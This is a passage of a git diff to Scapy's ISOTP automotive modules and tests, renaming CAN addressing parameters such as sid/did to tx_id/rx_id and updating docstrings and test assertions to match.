None: return msg - if hasattr(msg, "src"): - msg.src = self.src - if hasattr(msg, "dst"): - msg.dst = self.dst - if hasattr(msg, "exsrc"): - msg.exsrc = self.exsrc - if hasattr(msg, "exdst"): - msg.exdst = self.exdst + if hasattr(msg, "tx_id"): + msg.tx_id = self.tx_id + if hasattr(msg, "rx_id"): + msg.rx_id = self.rx_id + if hasattr(msg, "ext_address"): + msg.ext_address = self.ext_address + if hasattr(msg, "rx_ext_address"): + msg.rx_ext_address = self.rx_ext_address return msg diff --git a/scapy/contrib/isotp/isotp_packet.py b/scapy/contrib/isotp/isotp_packet.py index 94c98ea454a..7ba1d6812c0 100644 --- a/scapy/contrib/isotp/isotp_packet.py +++ b/scapy/contrib/isotp/isotp_packet.py @@ -37,9 +37,9 @@ class ISOTP(Packet): """Packet class for ISOTP messages. This class contains additional - slots for source address (src), destination address (dst), - extended source address (exsrc) and - extended destination address (exdst) information. This information + slots for source address (tx_id), destination address (rx_id), + extended source address (ext_address) and + extended destination address (rx_ext_address) information. This information gets filled from ISOTPSockets or the ISOTPMessageBuilder, if it is available. Address information is not used for Packet comparison. @@ -50,34 +50,34 @@ class ISOTP(Packet): fields_desc = [ StrField('data', b"") ] - __slots__ = Packet.__slots__ + ["src", "dst", "exsrc", "exdst"] + __slots__ = Packet.__slots__ + ["tx_id", "rx_id", "ext_address", "rx_ext_address"] # noqa: E501 def __init__(self, *args, **kwargs): # type: (Any, Any) -> None - self.src = kwargs.pop("src", None) # type: Optional[int] - self.dst = kwargs.pop("dst", None) # type: Optional[int] - self.exsrc = kwargs.pop("exsrc", None) # type: Optional[int] - self.exdst = kwargs.pop("exdst", None) # type: Optional[int] + self.tx_id = kwargs.pop("tx_id", None) # type: Optional[int] + self.rx_id = kwargs.pop("rx_id", None) # type: Optional[int] + self.ext_address = kwargs.pop("ext_address", None) # type: Optional[int] # noqa: E501 + self.rx_ext_address = kwargs.pop("rx_ext_address", None) # type: Optional[int] # noqa: E501 Packet.__init__(self, *args, **kwargs) self.validate_fields() def validate_fields(self): # type: () -> None - """Helper function to validate information in src, dst, exsrc and exdst - slots + """Helper function to validate information in tx_id, rx_id, + ext_address and rx_ext_address slots """ - if self.src is not None: - if not 0 <= self.src <= CAN_MAX_IDENTIFIER: - raise Scapy_Exception("src is not a valid CAN identifier") - if self.dst is not None: - if not 0 <= self.dst <= CAN_MAX_IDENTIFIER: - raise Scapy_Exception("dst is not a valid CAN identifier") - if self.exsrc is not None: - if not 0 <= self.exsrc <= 0xff: - raise Scapy_Exception("exsrc is not a byte") - if self.exdst is not None: - if not 0 <= self.exdst <= 0xff: - raise Scapy_Exception("exdst is not a byte") + if self.tx_id is not None: + if not 0 <= self.tx_id <= CAN_MAX_IDENTIFIER: + raise Scapy_Exception("tx_id is not a valid CAN identifier") + if self.rx_id is not None: + if not 0 <= self.rx_id <= CAN_MAX_IDENTIFIER: + raise Scapy_Exception("rx_id is not a valid CAN identifier") + if self.ext_address is not None: + if not 0 <= self.ext_address <= 0xff: + raise Scapy_Exception("ext_address is not a byte") + if self.rx_ext_address is not None: + if not 0 <= self.rx_ext_address <= 0xff: + raise Scapy_Exception("rx_ext_address is not a byte") def fragment(self, *args, **kargs): # type: (*Any, **Any) -> List[Packet] @@ -87,7 +87,7 @@ def fragment(self, *args, **kargs): :return: A list of CAN frames """ data_bytes_in_frame = 7 - if self.exdst is not None: + if self.rx_ext_address is not None: data_bytes_in_frame = 6 if len(self.data) > ISOTP_MAX_DLEN_2015: @@ -96,13 +96,13 @@ def fragment(self, *args, **kargs): if len(self.data) <= data_bytes_in_frame: # We can do this in a single frame frame_data = struct.pack('B', len(self.data)) + self.data - if self.exdst: - frame_data = struct.pack('B', self.exdst) + frame_data + if self.rx_ext_address: + frame_data = struct.pack('B', self.rx_ext_address) + frame_data - if self.dst is None or self.dst <= 0x7ff: - pkt = CAN(identifier=self.dst, data=frame_data) + if self.rx_id is None or self.rx_id <= 0x7ff: + pkt = CAN(identifier=self.rx_id, data=frame_data) else: - pkt = CAN(identifier=self.dst, flags="extended", + pkt = CAN(identifier=self.rx_id, flags="extended", data=frame_data) return [pkt] @@ -111,14 +111,14 @@ def fragment(self, *args, **kargs): frame_header = struct.pack(">H", len(self.data) + 0x1000) else: frame_header = struct.pack(">HI", 0x1000, len(self.data)) - if self.exdst: - frame_header = struct.pack('B', self.exdst) + frame_header + if self.rx_ext_address: + frame_header = struct.pack('B', self.rx_ext_address) + frame_header idx = 8 - len(frame_header) frame_data = self.data[0:idx] - if self.dst is None or self.dst <= 0x7ff: - frame = CAN(identifier=self.dst, data=frame_header + frame_data) + if self.rx_id is None or self.rx_id <= 0x7ff: + frame = CAN(identifier=self.rx_id, data=frame_header + frame_data) else: - frame = CAN(identifier=self.dst, flags="extended", + frame = CAN(identifier=self.rx_id, flags="extended", data=frame_header + frame_data) # Construct consecutive frames @@ -131,12 +131,12 @@ def fragment(self, *args, **kargs): n += 1 idx += len(frame_data) - if self.exdst: - frame_header = struct.pack('B', self.exdst) + frame_header - if self.dst is None or self.dst <= 0x7ff: - pkt = CAN(identifier=self.dst, data=frame_header + frame_data) + if self.rx_ext_address: + frame_header = struct.pack('B', self.rx_ext_address) + frame_header # noqa: E501 + if self.rx_id is None or self.rx_id <= 0x7ff: + pkt = CAN(identifier=self.rx_id, data=frame_header + frame_data) # noqa: E501 else: - pkt = CAN(identifier=self.dst, flags="extended", + pkt = CAN(identifier=self.rx_id, flags="extended", data=frame_header + frame_data) pkts.append(pkt) return pkts @@ -167,8 +167,10 @@ def defragment(can_frames, use_extended_addressing=None): results = [] for p in parser: - if (use_extended_addressing is True and p.exdst is not None) \ - or (use_extended_addressing is False and p.exdst is None) \ + if (use_extended_addressing is True and + p.rx_ext_address is not None) \ + or (use_extended_addressing is False and + p.rx_ext_address is None) \ or (use_extended_addressing is None): results.append(p) diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index d56e355f188..98c1504cf9c 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -417,8 +417,8 @@ def generate_code_output(found_packets, can_interface="iface", send_id = pack // 256 send_ext = pack - (send_id * 256) ext_id = orb(found_packets[pack][0].data[0]) - result += "ISOTPSocket(%s, sid=0x%x, did=0x%x, padding=%s, " \ - "extended_addr=0x%x, extended_rx_addr=0x%x, " \ + result += "ISOTPSocket(%s, tx_id=0x%x, rx_id=0x%x, padding=%s, " \ + "ext_address=0x%x, rx_ext_address=0x%x, " \ "basecls=ISOTP)\n" % \ (can_interface, send_id, int(found_packets[pack][0].identifier), @@ -427,7 +427,7 @@ def generate_code_output(found_packets, can_interface="iface", ext_id) else: - result += "ISOTPSocket(%s, sid=0x%x, did=0x%x, padding=%s, " \ + result += "ISOTPSocket(%s, tx_id=0x%x, rx_id=0x%x, padding=%s, " \ "basecls=ISOTP)\n" % \ (can_interface, pack, int(found_packets[pack][0].identifier), @@ -463,15 +463,15 @@ def generate_isotp_list(found_packets, # type: Dict[int, Tuple[Packet, int]] source_id = pack >> 8 source_ext = int(pack - (source_id * 256)) dest_ext = orb(pkt.data[0]) - socket_list.append(ISOTPSocket(can_interface, sid=source_id, - extended_addr=source_ext, - did=dest_id, - extended_rx_addr=dest_ext, + socket_list.append(ISOTPSocket(can_interface, tx_id=source_id, + ext_address=source_ext, + rx_id=dest_id, + rx_ext_address=dest_ext, padding=pad, basecls=ISOTP)) else: source_id = pack - socket_list.append(ISOTPSocket(can_interface, sid=source_id, - did=dest_id, padding=pad, + socket_list.append(ISOTPSocket(can_interface, tx_id=source_id, + rx_id=dest_id, padding=pad, basecls=ISOTP)) return socket_list diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index ddcd56e8ba6..e3dcef13516 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -78,25 +78,25 @@ class ISOTPSoftSocket(SuperSocket): Example (with NativeCANSocket underneath): >>> conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} >>> load_contrib('isotp') - >>> with ISOTPSocket("can0", sid=0x641, did=0x241) as sock: + >>> with ISOTPSocket("can0", tx_id=0x641, rx_id=0x241) as sock: >>> sock.send(...) Example (with PythonCANSocket underneath): >>> conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} >>> conf.contribs['CANSocket'] = {'use-python-can': True} >>> load_contrib('isotp') - >>> with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), sid=0x641, did=0x241) as sock: + >>> with ISOTPSocket(CANSocket(bustype='socketcan', channel="can0"), tx_id=0x641, rx_id=0x241) as sock: >>> sock.send(...) :param can_socket: a CANSocket instance, preferably filtering only can - frames with identifier equal to did - :param sid: the CAN identifier of the sent CAN frames - :param did: the CAN identifier of the received CAN frames - :param extended_addr: the extended address of the sent ISOTP frames + frames with identifier equal to rx_id + :param tx_id: the CAN identifier of the sent CAN frames + :param rx_id: the CAN identifier of the received CAN frames + :param ext_address: the extended address of the sent ISOTP frames (can be None) - :param extended_rx_addr: the extended address of the received ISOTP + :param rx_ext_address: the extended address of the received ISOTP frames (can be None) - :param rx_block_size: block size sent in Flow Control ISOTP frames + :param bs: block size sent in Flow Control ISOTP frames :param stmin: minimum desired separation time sent in Flow Control ISOTP frames :param padding: If True, pads sending packets with 0x00 which not @@ -109,11 +109,11 @@ class ISOTPSoftSocket(SuperSocket): def __init__(self, can_socket=None, # type: Optional["CANSocket"] - sid=0, # type: int - did=0, # type: int - extended_addr=None, # type: Optional[int] - extended_rx_addr=None, # type: Optional[int] - rx_block_size=0, # type: int + tx_id=0, # type: int + rx_id=0, # type: int + ext_address=None, # type: Optional[int] + rx_ext_address=None, # type: Optional[int] + bs=0, # type: int stmin=0, # type: int padding=False, # type: bool listen_only=False, # type: bool @@ -127,19 +127,19 @@ def __init__(self, elif isinstance(can_socket, six.string_types): raise Scapy_Exception("Provide a CANSocket object instead") - self.exsrc = extended_addr - self.exdst = extended_rx_addr - self.src = sid - self.dst = did + self.ext_address = ext_address + self.rx_ext_address = rx_ext_address + self.tx_id = tx_id + self.rx_id = rx_id impl = ISOTPSocketImplementation( can_socket, - src_id=sid, - dst_id=did, + src_id=tx_id, + dst_id=rx_id, padding=padding, - extended_addr=extended_addr, - extended_rx_addr=extended_rx_addr, - rx_block_size=rx_block_size, + extended_addr=ext_address, + extended_rx_addr=rx_ext_address, + rx_block_size=bs, stmin=stmin, listen_only=listen_only ) @@ -191,14 +191,14 @@ def recv(self, x=0xffff): if msg is None: return None - if hasattr(msg, "src"): - msg.src = self.src - if hasattr(msg, "dst"): - msg.dst = self.dst - if hasattr(msg, "exsrc"): - msg.exsrc = self.exsrc - if hasattr(msg, "exdst"): - msg.exdst = self.exdst + if hasattr(msg, "tx_id"): + msg.tx_id = self.tx_id + if hasattr(msg, "rx_id"): + msg.rx_id = self.rx_id + if hasattr(msg, "ext_address"): + msg.ext_address = self.ext_address + if hasattr(msg, "rx_ext_address"): + msg.rx_ext_address = self.rx_ext_address return msg @staticmethod @@ -470,7 +470,7 @@ class ISOTPSocketImplementation: collected by the GC. :param can_socket: a CANSocket instance, preferably filtering only can - frames with identifier equal to did + frames with identifier equal to rx_id :param src_id: the CAN identifier of the sent CAN frames :param dst_id: the CAN identifier of the received CAN frames :param padding: If True, pads sending packets with 0x00 which not diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index ea2cced9a42..67077a1a3cf 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -62,11 +62,11 @@ class ISOTPMessageBuilder(object): CAN frames are fed to an ISOTPMessageBuilder object with the feed() method and the resulting ISOTP frames can be extracted using the pop() method. - :param use_ext_addr: True for only attempting to defragment with + :param use_ext_address: True for only attempting to defragment with extended addressing, False for only attempting to defragment without extended addressing, or None for both - :param did: Destination Identifier + :param rx_id: Destination Identifier :param basecls: The class of packets that will be returned, defaults to ISOTP """ @@ -82,8 +82,8 @@ def __init__(self, total_len, first_piece, ts): self.total_len = total_len self.current_len = 0 self.ready = None # type: Optional[bytes] - self.src = None # type: Optional[int] - self.exsrc = None # type: Optional[int] + self.tx_id = None # type: Optional[int] + self.ext_address = None # type: Optional[int] self.time = ts # type: Union[float, EDecimal] self.push(first_piece) @@ -100,27 +100,27 @@ def push(self, piece): def __init__( self, - use_ext_addr=None, # type: Optional[bool] - did=None, # type: Optional[Union[int, List[int], Iterable[int]]] + use_ext_address=None, # type: Optional[bool] + rx_id=None, # type: Optional[Union[int, List[int], Iterable[int]]] basecls=ISOTP # type: Type[Packet] ): # type: (...) -> None self.ready = [] # type: List[Tuple[int, Optional[int], ISOTPMessageBuilder.Bucket]] # noqa: E501 self.buckets = {} # type: Dict[Tuple[Optional[int], int, int], ISOTPMessageBuilder.Bucket] # noqa: E501 - self.use_ext_addr = use_ext_addr + self.use_ext_addr = use_ext_address self.basecls = basecls - self.dst_ids = None # type: Optional[Iterable[int]] + self.rx_ids = None # type: Optional[Iterable[int]] self.last_ff = None # type: Optional[Tuple[Optional[int], int, int]] self.last_ff_ex = None # type: Optional[Tuple[Optional[int], int, int]] # noqa: E501 - if did is not None: - if isinstance(did, list): - self.dst_ids = did - elif isinstance(did, int): - self.dst_ids = [did] - elif hasattr(did, "__iter__"): - self.dst_ids = did + if rx_id is not None: + if isinstance(rx_id, list): + self.rx_ids = rx_id + elif isinstance(rx_id, int): + self.rx_ids = [rx_id] + elif hasattr(rx_id, "__iter__"): + self.rx_ids = rx_id else: - raise TypeError("Invalid type for argument did!") + raise TypeError("Invalid type for argument rx_id!") def feed(self, can): # type: (Union[Iterable[Packet], Packet]) -> None @@ -133,7 +133,7 @@ def feed(self, can): if not isinstance(can, Packet): return - if self.dst_ids is not None and can.identifier not in self.dst_ids: + if self.rx_ids is not None and can.identifier not in self.rx_ids: return data = bytes(can.data) @@ -196,14 +196,14 @@ def _build( bucket = t[2] data = bucket.ready or b"" p = basecls(data) - if hasattr(p, "dst"): - p.dst = t[0] - if hasattr(p, "exdst"): - p.exdst = t[1] - if hasattr(p, "src"): - p.src = bucket.src - if hasattr(p, "exsrc"): - p.exsrc = bucket.exsrc + if hasattr(p, "rx_id"): + p.rx_id = t[0] + if hasattr(p, "rx_ext_address"): + p.rx_ext_address = t[1] + if hasattr(p, "tx_id"): + p.tx_id = bucket.tx_id + if hasattr(p, "ext_address"): + p.ext_address = bucket.ext_address if hasattr(p, "time"): p.time = bucket.time return p @@ -296,8 +296,8 @@ def _feed_flow_control_frame(self, identifier, ea, data): for key, bucket in zip(keys, buckets): if bucket is None: continue - bucket.src = identifier - bucket.exsrc = ea + bucket.tx_id = identifier + bucket.ext_address = ea self.buckets[key] = bucket return True @@ -325,8 +325,8 @@ def __init__(self, *args, **kwargs): # type: (Any, Any) -> None super(ISOTPSession, self).__init__(*args, **kwargs) self.m = ISOTPMessageBuilder( - use_ext_addr=kwargs.pop("use_ext_addr", None), - did=kwargs.pop("did", None), + use_ext_address=kwargs.pop("use_ext_address", None), + rx_id=kwargs.pop("rx_id", None), basecls=kwargs.pop("basecls", ISOTP)) def on_packet_received(self, pkt): diff --git a/test/contrib/automotive/ecu.uts b/test/contrib/automotive/ecu.uts index f83d2cf636a..cc12c750276 100644 --- a/test/contrib/automotive/ecu.uts +++ b/test/contrib/automotive/ecu.uts @@ -497,7 +497,7 @@ assert unanswered_packets[0].diagnosticSessionType == 4 = Analyze multiple UDS messages with PcapReader(scapy_path("test/pcaps/ecu_trace.pcap.gz")) as sock: - udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) + udsmsgs = sniff(session=ISOTPSession, session_kwargs={"use_ext_address":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) assert len(udsmsgs) == 50 @@ -527,7 +527,7 @@ assert len(ecu.log["TransferData"]) == 2 session = EcuSession() with PcapReader(scapy_path("test/pcaps/ecu_trace.pcap.gz")) as sock: - udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_addr":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) + udsmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "use_ext_address":False, "basecls":UDS}, count=50, opened_socket=sock, timeout=3) assert len(udsmsgs) == 50 @@ -557,12 +557,12 @@ session = EcuSession() conf.contribs['CAN']['swap-bytes'] = True with PcapReader(scapy_path("test/pcaps/gmlan_trace.pcap.gz")) as sock: - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=2, opened_socket=sock, timeout=3) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=2, opened_socket=sock, timeout=3) ecu = session.ecu print("Check 1 after change to diagnostic mode") assert len(ecu.supported_responses) == 1 assert ecu.state == EcuState(session=3) - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=8, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=8, opened_socket=sock) ecu = session.ecu print("Check 2 after some more messages were read1") assert len(ecu.supported_responses) == 3 @@ -570,13 +570,13 @@ with PcapReader(scapy_path("test/pcaps/gmlan_trace.pcap.gz")) as sock: assert ecu.state.session == 3 print("assert 1") assert ecu.state.communication_control == 1 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=10, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=10, opened_socket=sock) ecu = session.ecu print("Check 3 after change to programming mode (bootloader)") assert len(ecu.supported_responses) == 4 assert ecu.state.session == 2 assert ecu.state.communication_control == 1 - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=16, opened_socket=sock) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=16, opened_socket=sock) ecu = session.ecu print("Check 4 after gaining security access") assert len(ecu.supported_responses) == 6 @@ -592,7 +592,7 @@ conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 conf.contribs['CAN']['swap-bytes'] = True with PcapReader(scapy_path("test/pcaps/gmlan_trace.pcap.gz")) as sock: - gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "did":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=200, opened_socket=sock, timeout=6) + gmlanmsgs = sniff(session=ISOTPSession, session_kwargs={"supersession": session, "rx_id":[0x241, 0x641, 0x101], "basecls":GMLAN}, count=200, opened_socket=sock, timeout=6) ecu = session.ecu assert len(ecu.supported_responses) == 0 diff --git a/test/contrib/automotive/gm/scanner.uts b/test/contrib/automotive/gm/scanner.uts index 8a33a212d94..32b8c40c95b 100644 --- a/test/contrib/automotive/gm/scanner.uts +++ b/test/contrib/automotive/gm/scanner.uts @@ -59,7 +59,7 @@ assert len(pkts) = Create GMLAN messages from packets -builder = ISOTPMessageBuilder(basecls=GMLAN, use_ext_addr=False, did=[0x241, 0x641]) +builder = ISOTPMessageBuilder(basecls=GMLAN, use_ext_address=False, rx_id=[0x241, 0x641]) msgs = list() for p in pkts: diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 05ae97309cf..b7c6adc78fb 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -75,7 +75,7 @@ assert len(pkts) = Create UDS messages from packets -builder = ISOTPMessageBuilder(basecls=UDS, use_ext_addr=False, did=[0x641, 0x651]) +builder = ISOTPMessageBuilder(basecls=UDS, use_ext_address=False, rx_id=[0x641, 0x651]) msgs = list() for p in pkts: diff --git a/test/contrib/isotp_message_builder.uts b/test/contrib/isotp_message_builder.uts index 6f255677add..3079bb43837 100644 --- a/test/contrib/isotp_message_builder.uts +++ b/test/contrib/isotp_message_builder.uts @@ -42,10 +42,10 @@ assert(m.count == 1) = Extract the message from the machine msg = m.pop() assert(m.count == 0) -assert(msg.dst == 0x241) -assert(msg.exdst is None) -assert(msg.src == 0x641) -assert(msg.exsrc is None) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is None) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is None) assert(msg.time == 1000) expected = dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28") assert(msg.data == expected) @@ -66,36 +66,36 @@ assert(msg is None) m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("04 AB CD EF 04"))) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is None) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is None) assert(msg.data == dhex("AB CD EF 04")) = Single frame without EA, with excessive bytes in CAN frame m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("03 AB CD EF AB CD EF AB"))) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is None) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is None) assert(msg.data == dhex("AB CD EF")) = Verify a single frame with EA m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("E2 04 01 02 03 04"))) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xE2) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0xE2) assert(msg.data == dhex("01 02 03 04")) = Single CAN frame that has 2 valid interpretations m = ISOTPMessageBuilder() m.feed(CAN(identifier=0x241, data=dhex("04 01 02 03 04"))) msg = m.pop(0x241, None) -assert(msg.dst == 0x241) -assert(msg.exdst is None) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is None) assert(msg.data == dhex("01 02 03 04")) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst == 0x04) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address == 0x04) assert(msg.data == dhex("02")) = Verify multiple frames with EA @@ -112,10 +112,10 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0xEA) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is 0xEA) assert(msg.time == 1005) assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) @@ -131,10 +131,10 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 24 18 19 1A 1B 1C 1D"))) m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xAE) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0xEA) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is 0xAE) assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) = Verify that an EA starting with 1 will still work @@ -145,10 +145,10 @@ m.feed(CAN(identifier=0x241, data=dhex("1A 21 06 07 08 09 0A 0B"))) m.feed(CAN(identifier=0x241, data=dhex("1A 22 0C 0D 0E 0F 10 11"))) m.feed(CAN(identifier=0x241, data=dhex("1A 23 12 13 14 15 16 17"))) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0x1A) -assert(msg.src == 0x641) -assert(msg.exsrc is 0x1A) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0x1A) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is 0x1A) assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14")) = Verify that an EA of 07 will still work @@ -157,10 +157,10 @@ m.feed(CAN(identifier=0x241, data=dhex("07 10 0A 01 02 03 04 05"))) m.feed(CAN(identifier=0x641, data=dhex("07 30 03 00" ))) m.feed(CAN(identifier=0x241, data=dhex("07 21 06 07 08 09 0A 0B"))) msg = m.pop(0x241, 0x07) -assert(msg.dst == 0x241) -assert(msg.exdst is 0x07) -assert(msg.src == 0x641) -assert(msg.exsrc is 0x07) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0x07) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is 0x07) assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A")) = Verify that three interleaved messages can be sniffed simultaneously on the same identifier and extended address (very unrealistic) @@ -186,22 +186,22 @@ m.feed(CAN(identifier=0x241, data=dhex("EA 22 3C 3D 3E 3F 40" ))) # end of mes m.feed(CAN(identifier=0x241, data=dhex("EA 25 1E 1F 20 21 22 23"))) m.feed(CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))) # end of message A msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0xEA) assert(msg.data == dhex("A6 A7 A8")) assert(msg.time == 200) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0xEA) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is 0xEA) assert(msg.time == 400) assert(msg.data == dhex("31 32 33 34 35 36 37 38 39 3A 3B 3C 3D 3E 3F 40")) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0xEA) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is 0xEA) assert(msg.time == 300) assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) @@ -220,10 +220,10 @@ msgs = [ CAN(identifier=0x241, data=dhex("EA 26 24 25 26 27 28" ))] m.feed(msgs) msg = m.pop() -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0xEA) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is 0xEA) assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) = Verify multiple frames with EA from list and iterator @@ -247,10 +247,10 @@ assert len(m) == 3 isotpmsgs = [x for x in m] assert len(isotpmsgs) == 3 msg = isotpmsgs[0] -assert(msg.dst == 0x241) -assert(msg.exdst is 0xEA) -assert(msg.src == 0x641) -assert(msg.exsrc is 0xEA) +assert(msg.rx_id == 0x241) +assert(msg.rx_ext_address is 0xEA) +assert(msg.tx_id == 0x641) +assert(msg.ext_address is 0xEA) assert(msg.data == dhex("01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 28")) assert isotpmsgs[1] == isotpmsgs[2] diff --git a/test/contrib/isotp_native_socket.uts b/test/contrib/isotp_native_socket.uts index 41a0e587d16..b9a4688b67d 100644 --- a/test/contrib/isotp_native_socket.uts +++ b/test/contrib/isotp_native_socket.uts @@ -24,7 +24,7 @@ exit_if_no_isotp_module() message = "01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14" -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x642, did=0x242) as s: +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, tx_id=0x642, rx_id=0x242) as s: p = subprocess.Popen(["isotpsend", "-s", "242", "-d", "642", iface0], stdin=subprocess.PIPE, universal_newlines=True) p.communicate(message) r = p.returncode @@ -37,7 +37,7 @@ with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x642, did=0x242) exit_if_no_isotp_module() message = "01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14" -with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, sid=0x644, did=0x244, extended_addr=0xaa, extended_rx_addr=0xee) as s: +with new_can_socket0() as isocan, ISOTPSoftSocket(isocan, tx_id=0x644, rx_id=0x244, ext_address=0xaa, rx_ext_address=0xee) as s: p = 